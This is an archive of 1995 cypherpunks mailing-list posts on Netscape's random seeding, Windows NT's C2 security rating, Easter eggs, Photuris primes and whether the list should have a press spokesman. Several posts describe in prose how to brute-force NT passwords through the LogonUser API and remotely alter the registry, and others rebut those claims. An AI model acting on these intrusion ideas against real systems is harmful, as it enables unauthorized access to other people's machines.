>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David R. Conrad" <drc@russell.moore.com>
Date: Tue, 26 Sep 95 05:42:01 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape "random" number seed generator code available
In-Reply-To: <199509251159.EAA08528@mycroft.rand.org>
Message-ID: <Pine.LNX.3.91.950926083206.866F-100000@russell.moore.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 25 Sep 1995, Jim Gillogly wrote:

> > jsw@neon.netscape.com (Jeff Weinstein) writes:
> > More on the RNG stuff.  On Unix systems we look for ~/.pgp/randseed.bin,
> > and feed it through the RNG hash.
> 
> Interesting idea, but I have a (perhaps irrational) dislike for this idea.
> If Netscape wants to have its own netsceed.bin file to muck around with on
> my system, I'll authorize it to be set up, but I by god don't want it
> mucking around with my PGP setup.  ...

I thought about this a bit, but I don't think that reading randseed.bin
counts as "mucking around with" the "PGP setup."

PGP launders randseed.bin before saving it for just this reason, so that
reading it won't reveal information on the user's session keys.

And the Netscape folks have published the source code which shows that
they only read the file and hash it with MD5.  That the contents of
randseed.bin have been mixed into an MD5 hash with a bunch of other
things can hardly be called a security hole, in my estimation.

David R. Conrad, conrad@detroit.freenet.org, http://www.grfn.org/~conrad
Hardware & Software Committee  --  Finger conrad@grfn.org for public key
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
No, his mind is not for rent to any god or government.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Markley <mmarkley@microsoft.com>
Date: Tue, 26 Sep 95 09:11:19 PDT
To: cypherpunks@toad.com
Subject: Re: Hack Microsoft?
Message-ID: <9509261711.AA01641@netmail2.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain



Dan Bailey <dan@milliways.org> writes:

| 	There also is no way to stop remote users from modifying the
| registry.  *Any* user with an account can remotely dump and modify the
| system registry.  So in theory you can write a bruteforce program to
| keep guessing until it gets a password, then modify the registry to
| make the system to "interesting" things.  The worst part of all this
| is that the Registry is very poorly documented, MSoft must consider
| most of that info "confidential."
| 	Fortunately, when using NT's SMB services such as drive and file
| sharing, passwords are never sent in the clear.  Just make sure you
| disable that "Guest" account.:)

This is not entirely true. If I log in as 'guest' I cannot modify just 
any key in the registry. I can only modify the ones that I have 
permissions to change.  Also if you know what you are doing you can set 
permissions on any key in the registry so that it can't be modified by 
just anyone.  I can also modify the account permissions so that if a 
logon attempt fails, after a specified number of retries the account is 
locked and will not accept logons until the administrator unlocks the 
account. I'd recommend that you get a copy of Windows NT and the 
Windows NT Resource Kit, install it and play around with the security 
system before you make generalized statements about it.

Mike.
=====================================================

Mike Markley <mmarkley@microsoft.com>

I'm not a Microsoft spokesperson. All opinions expressed here are mine.

=====================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 26 Sep 95 08:59:33 PDT
To: cypherpunks@toad.com
Subject: Re: Cypherpunks Press release
Message-ID: <ac8d6cee030210045390@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


I guess you all know how much I hate this "who will be our spokesman?"
thread, but my opinion has been explicitly asked, so I will again comment.
Hopefully, adding a few new points.

At 6:55 AM 9/26/95, Craig Hubley wrote:

>Damn fine idea, but how do a bunch of (p)anarchists choose a mouthpiece ?
>Should we assign someone to be 'our' lawyer ?
>
>I'd volunteer to be 'spokespunk', I've certainly been interviewed for TV and
>print enough, and know how to handle and present myself to the press, but if
>this is considered an 'honor' rather than a 'pain in the ass and potential
>legal lightning rod' then I'd like to suggest someone with a longer pedigree
>who has been writing more code lately take it on.  Tim ?

I've turned down several recent chances for interviews, for these reasons:

1. I feel the people doing the work should be interviewed, not just someone
who has some visibility (whatever mine might be). If PGP is the issue, then
they should talk to those working on PGP. If anonymous remailers are the
issue, etc. If, by some chance, they are interested in things I have
directly worked on or written extensively about, then maybe they should
interview me.

(Although for other reasons I refused to have my name attached to the cover
story in "Information Week" about "Internet Theft," BlackNet, etc.)

2. Location, location, location! The media foci are Washington, New York,
and San Francisco, at least for our area of interest. Occasional forays
into Austin, Miami, L.A., etc. This is where the taped interviews are done.

Several "crews" recently in SF wanted "sound bites" and "video bites" from
people like me. I refused, pointing out the wastefullness of my time in
driving 100 miles over mountain roads to SF, fighting parking problems,
waiting around, and ending up with a 7.89 second clip of me saying
something scripted.

(In February I stupidly agreed to travel to LA for a filming of a BBC show
about encryption. Left at dawn, drove to San Jose, flew to LA, took shuttle
to Hollywood, waited around for several hours while crew finished taping
Alvin and Heidi Toffler, set up my laptop, was interviewed by show's
producer, agreed at her repeated prodding to say "I am a Cypherpunk." Got
back to my house at midnight. Guess what they used? The stupid line "I am a
Cypherpunk" and maybe about 20 seconds of other random comments. This is
what we face, as other high tech shows I see have the same disjointed,
out-of-context flavor.)

The point? These "journalists" are tuned to looking for catchy quotes, all
the more so on video than in print. Text journalists can handle complex
themes much better than video reporters can, for many and oft-discussed
reasons.

(Even more disgusting than this was a more recent appearance of a BBC film
crew at a Cypherpunks meeting. They wanted to "stage" the news, to have the
meeting discuss a 2-year-old topic, because that's what their script called
for. I got up and left, as did several other people. I haven't seen this
BBC show, but I gather from a URL that this is the one that has
"performance art" examples of crypto....)

Any "spokesman" needs to be easily accessible when they need a "filler
quote," or a "reaction quote."

However:

3. THERE IS NO SPOKESMAN, THERE IS NO CENTRAL OFFICE, THERE IS NO BOARD OF
DIRECTORS!

With no organization, no office, no coordination, we cannot "feed the media
machine" the way it expects to be fed.

Nor can we "elect" such folks. I didn't help start this list--not that this
gives me more moral sway--in order that J. Random Volunteer will start
speaking for "our beliefs" or will start explaining "our goals" and "our
plans."

Far better that journalists like Steven Levy and John Markoff subsribe to
the list, or to condensations by people like Eric Blossom, and then deal
directly with the experts in some area. Thus, on the latest Netscape flaw,
they would contact Ray Cromwell directly, not deal with the press releases
written by J. Random Volunteer.

Anarchy is part of our charm. More importantly, part of our theme.

Face it, we don't have a press office, we don't have staffing, and--most
importantly--there is no one out there who speaks for me. A spokesman for
the Cypherpunks is an oxymoron.

--Tim May


---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Tue, 26 Sep 95 06:16:11 PDT
To: cypherpunks@toad.com (Cypherpunks List)
Subject: truerand
Message-ID: <9509261314.AA00248@wombat.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


Could someone please send me a copy of the truerand code Matt Blaze
posted yesterday?  I inadvertently deleted the message and Todd's
Cpunk archives seem to have shut down about a month ago.  Many thanks.


-- Jeff



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Tue, 26 Sep 95 10:41:41 PDT
To: cypherpunks@toad.com
Subject: Re: Easter Eggs
In-Reply-To: <9509261421.AA00130@cfdevx1.lehman.com>
Message-ID: <199509261614.JAA15814@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> In article <199509251159.EAA08528@mycroft.rand.org>, jim@acm.org (Jim
> Gillogly) wrote:

> >I'm nervous enough about all the Easter Eggs that have been reported in
> >Netscape, like the secret keystroke shortcut to get to Fishcam, or the
> >different behavior it exhibits when it finds a certain obscurely-named
> >directory at the top level. 

> Rick Busdiecker <rfb@lehman.com> writes:
> Personally, I like the Easter Eggs in Netscape and other software
> products.  I don't know if there's an consensus definition of `Easter
> Egg', but my working definition is something like ``An unpublicized,
> unharmful, preferably amusing, feature for which interested users may
> hunt.''  I think that such things add some fun for curious users and

I enjoy Easter Eggs in general, and I agree that a program with fun stuff
like this in it gives one a warm fuzzy feeling about the relaxed management
style at the company that produces it.  On the other hand, of all kinds of
mass market software, network-aware software needs to have the most trust
from the users, because it alone has the capability of passing information
out of your machine.  My preference is always to have source code
available for security-critical functions so that I can verify that it's
not only doing what I want, but also doing nothing that I don't want.

For a program like Netscape it doesn't make sense to supply source code,
of course, and the Easter Eggs already provide some evidence that it's
doing something that I didn't "buy" (assuming I've bought it, of course).
From there it's a short step to the questions "What else is it doing that
I didn't pay for?  Reading my PGP key generation environment?
Interesting.  What else?"

> I didn't know about the FishCam Easter Egg, but I know that Netscape

Ctrl-alt-f if you're a PC type, or Ctrl-meta-f if you're on a Sun; I'm
calling the diamond to the left of the space bar a "meta".

	Jim Gillogly
	Hevensday, 5 Winterfilth S.R. 1995, 16:14




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Tue, 26 Sep 95 09:24:33 PDT
To: cypherpunks@toad.com
Subject: RE: More on "Entropy"
Message-ID: <199509261622.JAA02167@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <DFHJDD.Ap@sgi.sgi.com>, David Van Wie <dvw@hamachi.epr.com> writes:

> David Van Wie wrote:

>>> The entropy E is defined by the sum across n states of -P_i log_2(P_i),

> Timothy C. May wrote:

>> Hah! Another physicist converted to the information-theoretic view of 
> entropy!

> Indeed.  I was able to track down the literature, and it is most 
> interesting.  I am still a little bit skeptical of the "superset including 
> thermodynamic entropy" school of thought, but I haven't finished reading all 
> of the materials yet!  Clearly, the IT "version" of entropy is a well 
> defined and useful thing....

We used this formulation of entropy in Statistical Mechanics.  It's
especially useful in Quantum Thermo where you can actually enumerate all
of the states instead of relying on probabilistic arguments.

-- 
Sure we spend a lot of money, but that doesn't mean    |  Tom Weinstein
we *do* anything.  --  Washington DC motto             |  tomw@engr.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William Allen Simpson" <bsimpson@morningstar.com>
Date: Tue, 26 Sep 95 05:00:30 PDT
To: cypherpunks@toad.com
Subject: Re: Primality verification needed
Message-ID: <1560.bsimpson@morningstar.com>
MIME-Version: 1.0
Content-Type: text/plain


While you folks are poking at Phil's latest, perhaps you could verify the
others that he generated, already in the Photuris internet-draft:

A 1024-bit strong prime (p), expressed in hex:

97f6 4261 cab5 05dd 2828 e13f 1d68 b6d3
dbd0 f313 047f 40e8 56da 58cb 13b8 a1bf
2b78 3a4c 6d59 d5f9 2afc 6cff 3d69 3f78
b23d 4f31 60a9 502e 3efa f7ab 5e1a d5a6
5e55 4313 828d a83b 9ff2 d941 dee9 5689
fada ea09 36ad df19 71fe 635b 20af 4703
6460 3c2d e059 f54b 650a d8fa 0cf7 0121
c747 99d7 5871 32be 9b99 9bb9 b787 e8ab

The recommended generator (g) for this prime is 2.


A 1024-bit strong prime (p), expressed in hex:

a478 8e21 84b8 d68b fe02 690e 4dbe 485b
17a8 0bc5 f21d 680f 1a84 1313 9734 f7f2
b0db 4e25 3750 018a ad9e 86d4 9b60 04bb
bcf0 51f5 2fcb 66d0 c5fc a63f bfe6 3417
3485 bbbf 7642 e9df 9c74 b85b 6855 e942
13b8 c2d8 9162 abef f434 2435 0e96 be41
edd4 2de9 9a69 6163 8c1d ac59 8bc9 0da0
69b5 0c41 4d8e b865 2adc ff4a 270d 567f

The recommended generator (g) for this prime is 5.

Bill.Simpson@um.cc.umich.edu
          Key fingerprint =  2E 07 23 03 C5 62 70 D3  59 B1 4F 5E 1D C2 C1 A2




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sentiono@cycor.ca (Sentiono Leowinata)
Date: Tue, 26 Sep 95 05:23:58 PDT
To: cypherpunks@toad.com
Subject: Netscape for OS/2, when? (Re: Another Netscape Bug)
Message-ID: <199509261223.JAA01800@bud.peinet.pe.ca>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 26 Sep 1995 05:58:19 -0400 (EDT) you wrote:

>> It's not an exploit script, but you can find an auto crash "animation"
>> for Ray's discovered bug on 
>>   http://hplyot.obspm.fr/~dl/netscapesec/c1.html
>> (or click from the updated http://hplyot.obspm.fr/~dl/netscapesec/)
>Crashes the 16-bit Windows version 1.1N.
>DCF

Same here. For more information (not Netscape related), Web Explorer
1.02 for OS/2 also crashes for the long URL.
I wish Netscape will port it to OS/2 (already ask them, but no comment
from Netscape). I don't try it on Netscape 1.1N as it doesn't run
reliably under Win-OS/2 (10 min -> crash! ;)
------------------------------------------------------
Sentiono Leowinata, Charlottetown, Prince Edward Island, Canada
System Engineer/Programmer Analyst - Cycor Communications Inc. 
sentiono@cycor.ca, 902-629-2488, http://www.cycor.ca/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 26 Sep 95 06:56:14 PDT
To: craig@passport.ca (Craig Hubley)
Subject: Re: cypherpunks press releases/contact list: YES!! DO IT!!
In-Reply-To: <m0sxU3V-001BjIC@passport.ca>
Message-ID: <199509261355.JAA16305@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Craig Hubley writes:
> > we've gone over this many times. We aren't a group. We're a mailing
> > list. We've got a diversity of opinions, and we have no organization
> > -- nor do we want one.
> 
> True enough, but there are sometimes rough consenses on technical questions,
> and if it were clear enough that these were collective in nature and not to
> be ascribed to any particular person, e.g.:
> 
> "Consensus on cypherpunks seems to be that 40 bit encryption is not viable
>  for commercial applications, and that Netscape seems to have taken less
>  than due care to choose an appropriate random seed for its session keys."

Why bother? Why not just say, if asked, that most reasonable technical
experts believe 40 bits are too small, or show them by a technical
demonstratino as we already have?

There is this widespread and wholely misplaced affection for
"cypherpunks". We aren't a company or an organization. This is a
mailing list, and occassionally a seminar series in places like
NoCal. It isn't a "group".

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 26 Sep 95 09:53:02 PDT
To: cypherpunks@toad.com
Subject: "Notes" to be Eclipsed by "Netscape"
Message-ID: <ac8d7d09040210041c62@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:52 PM 9/25/95, Jon Lasser wrote:

>Perhaps the Notes pricing scheme is sooo outrageous (by the standards of
>a student like myself, and probably most others, if it's still anything
>like it was at the 1.0 release) that mostpeople have had zero opportunity
>to examine the program, let alone really have time to play with it?

I've never even _seen_ a copy of Notes running on any machine, nor do I
know directly of _any_ of my colleagues who has. (Not saying nobody has, of
course, just that I can't find anyone I know well who has.)

I've been following the news on Notes for at least several years, even to
the point of buying some Lotus stock several years ago on the strength of
what I had read about Notes. (Alas, I sold it soon thereafter, before a
run-up in price.)

My point? Notes is nearly invisible in the non-corporate community I now
hang out in.

Who knows what weaknesses or bugs it has in it. Folks on our list probably
don't have much familiarity with it.

My hunch is that, as the "Wall Street Journal" reported yesterday, that IBM
overpaid for Lotus, that the notion of Notes becoming the universal
collaboration/communication option is flawed.

(I've been saying for a while that the Web serves that purpose better, and
that Web browsers will likely edge out Notes. Apparently I was hardly
prescient, as Netscape recently bought Collabra, which is pushing that
point exactly.)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 26 Sep 95 07:12:10 PDT
To: craig@passport.ca (Craig Hubley)
Subject: Re: Cypherpunks Press release
In-Reply-To: <m0sxTvi-001BjLC@passport.ca>
Message-ID: <199509261411.KAA16336@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Craig Hubley writes:
> I'd volunteer to be 'spokespunk',

You don't speak for me, sir, and never will.

I do my own talking to the press.

Oh, and thank you for helping Detweiler start another flame war. I'm
sure he's very happy (in between thorzine doses).

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 26 Sep 95 07:19:33 PDT
To: "K. M. Ellis" <kelli@zeus.towson.edu>
Subject: Re: Fax Number List
In-Reply-To: <Pine.ULT.3.91.950925192929.1630E-100000@zeus.towson.edu>
Message-ID: <199509261418.KAA16344@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



There are not going to be any "cypherpunks press releases" so there is
no need for this.

"K. M. Ellis" writes:
> 
> I promised last week that I would send this out when the idea of a 
> blanket-fax-campaign for a c-punks press release was being discussed.  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Tue, 26 Sep 95 07:23:57 PDT
To: Lucky Green <shamrock@netcom.com>
Subject: Easter Eggs
In-Reply-To: <199509260259.WAA20138@book.hks.net>
Message-ID: <9509261421.AA00130@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

    Date: Mon, 25 Sep 1995 22:59:11 -0400
    From: Lucky Green <shamrock@netcom.com>
    Subject: Re: Netscape "random" number seed generator code available

    In article <199509251159.EAA08528@mycroft.rand.org>, jim@acm.org (Jim
    Gillogly) wrote:

    >I'm nervous enough about all the Easter Eggs that have been reported in
    >Netscape, like the secret keystroke shortcut to get to Fishcam, or the
    >different behavior it exhibits when it finds a certain obscurely-named
    >directory at the top level. 
    
    Would you please elaborate?

Personally, I like the Easter Eggs in Netscape and other software
products.  I don't know if there's an consensus definition of `Easter
Egg', but my working definition is something like ``An unpublicized,
unharmful, preferably amusing, feature for which interested users may
hunt.''  I think that such things add some fun for curious users and
indicate a bit of `hacker spirit' in the development team -- meaning
`hacker' in the classic sense, not the media-bastardize synonym of
`cracker'.  I also think that in Netscape their existance is an
indication that the managment at Netscape is a bit less uptight than
management at some other places.

I didn't know about the FishCam Easter Egg, but I know that Netscape
has a couple of Easter Eggs related to the activity indicator in the
top right of the display.  Typically this is the Big N logo with
animated meteors, etc. flying by when the window is active.  One
Easter Egg temporarily turns this into a compass which spins to
indicate activity.  Another causes the animation to show a dragon
(Mozilla) breathing fire for the remainder of the session.  I won't
spoil your fun by telling how to find them.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGgMNJNR+/jb2ZlNAQEnnQP/TAYOTJtoWX8Pn0cXrKNSlpTCFnyWxC+3
U1E5xUxWMXsbEet3ENu35NtR03ZeyZCVr5viKTTmLptwFf/Qac4isTU78G3YOFTe
A3dX2KZfshxDtrk+n3Rx+NQtUSA+qRn/r0mPYLlFrsMCIXi/sUVhQKY1BH1eRXUK
tghPqDV0exE=
=jgb5
-----END PGP SIGNATURE-----
--
Rick Busdiecker                        Please do not send electronic junk mail!
 net: rfb@lehman.com or rfb@cmu.edu    PGP Public Key: 0xDBD9994D
 www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html
 send mail, subject "send index" for mailbot info, "send pgp key" gets my key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dan@milliways.org  (Dan Bailey)
Date: Tue, 26 Sep 95 07:33:22 PDT
To: rjc@clark.net
Subject: Re: Hack Microsoft?
Message-ID: <199509261433.AA11352@ibm.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 26 Sep 1995 00:04:08 -0400 (EDT) you wrote:

>
>
>   Microsoft recently got C2-security status approved for Windows NT by
>the National Computer Security Center, a division of the NSA. They
>are supposed to put systems through "laborious testing and review" before
>  If Cypherpunks can find flaws that the NSA can't, or won't divulge,
>what does that say about their so-called COMSEC ability.
>
For fun ways to hack NT, check out http://www.somar.com/security.html.
 Some of these are really laughable.  You can use NT's LogonUser API
call to repeatedly guess passwords until you hit it, since NT offers
no way to limit number of login attempts.
	There also is no way to stop remote users from modifying the
registry.  *Any* user with an account can remotely dump and modify the
system registry.  So in theory you can write a bruteforce program to
keep guessing until it gets a password, then modify the registry to
make the system to "interesting" things.  The worst part of all this
is that the Registry is very poorly documented, MSoft must consider
most of that info "confidential."
	Fortunately, when using NT's SMB services such as drive and file
sharing, passwords are never sent in the clear.  Just make sure you
disable that "Guest" account.:)
							Dan Bailey
***************************************************************
#define private public						dan@milliways.org
Worcester Polytechnic Institute and The Restaurant at the End of the Universe
***************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Tue, 26 Sep 95 10:37:13 PDT
To: cypherpunks@toad.com
Subject: Re: Security Update news release
Message-ID: <9509261733.AA22080@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> >
> >  Here is the press release we put out this morning regarding the fix
> >for RNG seed and stack overflow problems.
> 
> Do the new versions use PGP's randseed.bin? If Netscape even only looks at
> data used to keep PGP secure,  Netscape will be banned from my computer
> and every computer I am responsible for. -- For good.

That doesn't quite make sense.  Netscape reading randseed.bin can have no
effect on the security of PGP.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Scanlon <tfs@vampire.science.gmu.edu>
Date: Tue, 26 Sep 95 07:45:11 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: Hack Microsoft?
In-Reply-To: <199509260404.AAA14297@clark.net>
Message-ID: <9509261444.AA10518@vampire.science.gmu.edu>
MIME-Version: 1.0
Content-Type: text/plain




It should be possible to FOIA the evaluation that
led to the C2 status on this. That would be one good
avenue to start looking at it.

At the end of the process there should be a document
that shows how the OS meets each of the C2 requirments
and what aspects of the software were considered as
well.

Things like the state the OS was running under at the
time, (network vs. non-network etc.) are important
considerations in evaluations.

And I would not be too surprised at all if the "C2"
designation was relativly bogus. This sort of thing
can get much like the anti-crypto crowds arguments.
Highly political with little basis in rationality.

Since I've seen stuff like a ported version of Unix's
"ps" utility, and know NT runs a microkernel, I can think
of a hell of allot of ways it'd be possible to fail
it right out of the box... Considering that it has the
cpacity to do all sorts of network stuff, including FTP
& the like, I wonder how the hell they passed any audit
requirements. Probably a "Well it runs in a single user model,
we don't need to have strong audit requirments".

My point basicly being that I would consider the C2 designation
for this to be broken coming out of the box unless I saw
proof that it was otherwise. To operate it in a C2 required
environment without consideration of how & under what
conditions the rating was achived would be criminaly
irresponsible.


Tim Scanlon




________________________________________________________________
tfs@vampire.science.gmu.edu (NeXTmail, MIME)  Tim Scanlon
George Mason University     (PGP key avail.)  Public Affairs
I speak for myself, but often claim demonic possession




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Leslie Todd Masco <cactus@hks.net>
Date: Tue, 26 Sep 95 08:00:50 PDT
To: cypherpunks@toad.com
Subject: Archives current again
Message-ID: <199509261458.KAA22013@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


I've just updated the archives (http://www.hks.net/cpunks/index.html).  To
bring everybody up to date on what's happening:

Hypermail simply isn't up to this size of an archive.  All sorts of bugs
are coming out into the open, so I've been implementing a system designed
for large archives.  Alas, reality has intruded and I haven't had the time
to finish it.

So, I'll be updating the archives by hand from time to time until I can get
the new system on line.  Sorry 'bout that, folks, but you get what you pay
for.
- --
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMGgVHCoZzwIn1bdtAQE0gwF/dQiO+4lTabDqAt0SgyHmEJSKXgCABGa6
kEOsJIgd/4uIUzrunV+fXBucevMsW4yG
=BngF
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Scanlon <tfs@vampire.science.gmu.edu>
Date: Tue, 26 Sep 95 08:09:51 PDT
To: cypherpunks@toad.com
Subject: Insecurity in WWW oriented security
Message-ID: <9509261509.AA10554@vampire.science.gmu.edu>
MIME-Version: 1.0
Content-Type: text/plain



I wanted to share an experience with folks on the list
that points to the relavince of what c'punks have been
doing looking at the Web encryption & security issues
like we have.

I was approached by a headhunter yesterday who wanted me
to do the security for a hospital connected to the net.
Straightforward stuff one would think. My inital reaction
was fairly positive, and I responded that I didn't think
I would have much trouble with the task as long as they had
a resonable setup internaly etc. etc. (I'm not a big beliver
in hard & crunchy -> soft & chewey when your accounting or
other critical data is part of what can be chewed up...)

Well at that point it got interesting. He told me that said
client was asking as a part of their requirments that they
be able to do "Secure transactions using HTML & Netscape".
My reaction was somwehere allong the lines of "What do they
mean by `secure transactions'!! Are they aware that the state of
encryption for WWW is really poor at best right now? I told him
that I thought this might not be such a hot idea, and that
my interest in this whole thing would hinge totaly upon exactly
what sorts of transactions they wanted to do using web servers
and the like. And that depending on the answer to that, I would
or would not be intrested in the whole thing.

The reason for my hesitation? I don't want blood on my hands over
a setup that is by definition currently in a state of very poor
security. And right now I have no idea if they want to transfer
MasterCard's or MRI's. But I do know that depending on what it
is they're planning, it might not be a place *I* want to be.

Besides being damned frightening, this points to a trend in
network evolution. Organizations are planning these sorts of
moves and utilizations of the technology with little thought
to the possible consequences of it.

And if the FBI ends up busting some psyco in the future for
tampering with the transactions of MRI data, x-rays, or any
of a million other possibilities, I seriously doubt that
Loius Freeh will be stepping forward to remind us all of
the need for robust security. Instead, it is far more likely
that he would argue that it was another example of the need
for increased monitoring of the internet and controls on
cryptographic solutions.

I found aspects of the whole conversation, juxtaposed with
what has been going on lately with the list chilling to
say the least.



Tim Scanlon


________________________________________________________________
tfs@vampire.science.gmu.edu (NeXTmail, MIME)  Tim Scanlon
George Mason University     (PGP key avail.)  Public Affairs
I speak for myself, but often claim demonic possession








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@santafe.edu (Nelson Minar)
Date: Tue, 26 Sep 95 10:33:53 PDT
To: cypherpunks@toad.com
Subject: Re: Security Update news release
In-Reply-To: <199509260306.XAA20157@book.hks.net>
Message-ID: <9509261732.AA08810@sfi.santafe.edu>
MIME-Version: 1.0
Content-Type: text/plain


>Do the new versions use PGP's randseed.bin? If Netscape even only looks at
>data used to keep PGP secure,  Netscape will be banned from my computer
>and every computer I am responsible for. -- For good.

This is the second person who has expressed this sentiment. I don't
understand it. If you believe that the possibility of randseed.bin
getting out is dangerous, then why do you leave it online? Do you
really trust every piece of software you run, every piece of software
that can possibly access your machine over the net, to not look at
that file?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 26 Sep 95 11:58:55 PDT
To: cypherpunks@toad.com
Subject: Re: Hack Microsoft NT C2 Rating?
Message-ID: <199509261856.LAA24022@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:27 AM 9/26/95 -0700, todd@lgt.com (Todd Glassey) replied to Ray:
>>So, if one can find bugs in NT's security, one can
>>toss a little more egg on the NSA's face and the sham that part of
>>their activies to *help* to secure american computers. A simple
>>violation of NT's C2 status would be to demostrate a flaw in it's
>>memory protection implementation.

One of the bigger cracks on VMS was after it got its C2 rating;
a strong system doesn't do you much good if you don't change
the default passwords for the SYSTEM and FIELD service accounts :-)

I'm more surprised by the rating since the Orange Book is basically
for non-networked systems; Red Book rating is _much_ harder, unless
the NSA's taking a different view of trustability of software encryption 
for authentication purposes than they used to.

>As per NT's orange book C2 Rating... C2 is about the lowest level of Secure
>that you can get. In fact I personally am unimpressed, rather it is a box
>on an RFQ that gets checked.  Very few people run C anything sites in reality.

A C2 rating says that most of the obvious bugs have been found, access to
the system and individual files requires authentication, and you can do an 
audit trail to find out who accessed what data when.  Ignoring networks,
that's not too bad.  But, yeah, one of the big reasons for C2 rating is that
government RFPs generally require C2 security, at least for military or
sensitive non-military purchases.  B-level ratings give you multi-level
security, so you can run SECRET and CONFIDENTIAL on the same box;
it's not a very useful security model for non-military applications,
but does let you do a better-trusted job of system integrity.

>IMHO - Military sites passing real classified data usually are not run on
>anything as low as C2. If you want a secure os, look at the Harris Computer
>Corp's B1-Certified version of ES/MP UNIX (they call it CX/SX). 

Hah.  Maybe it's changed since I was working with the AT&T System V/MLS folks,
but the vast majority of classified processing back then was done on unrated
or C2 systems running System High - everybody's cleared, and the boxes
with the classified stuff aren't connected to the outside except by
limited sneakernet.  You can get a _lot_ of security by keeping your
computers in locked rooms, and the average PC of those days could fit
in a big safe at night even if it couldn't fit in a locked file cabinet.
(And floppy disks or external shoeboxes were easy to lock up.)


Dan B. wrote
>For fun ways to hack NT, check out http://www.somar.com/security.html.
>Some of these are really laughable.  You can use NT's LogonUser API
>call to repeatedly guess passwords until you hit it, since NT offers
>no way to limit number of login attempts.
That's the kind of thing that would get changed for a C2 version,
just as the Unix login program had to be souped up for C2 and B1.
Even adding a constant delay, or an increasing delay after bad attempts,
is a good start for systems like that.  (It turns out that logging
user names on bad attempts has to be done carefully to avoid
increasing risk - if users get out of sync on typeahead when
entering their login and password, you can end up logging 
passwords, which was especially bad when that sort of data got
printed on the paper console...)
#---
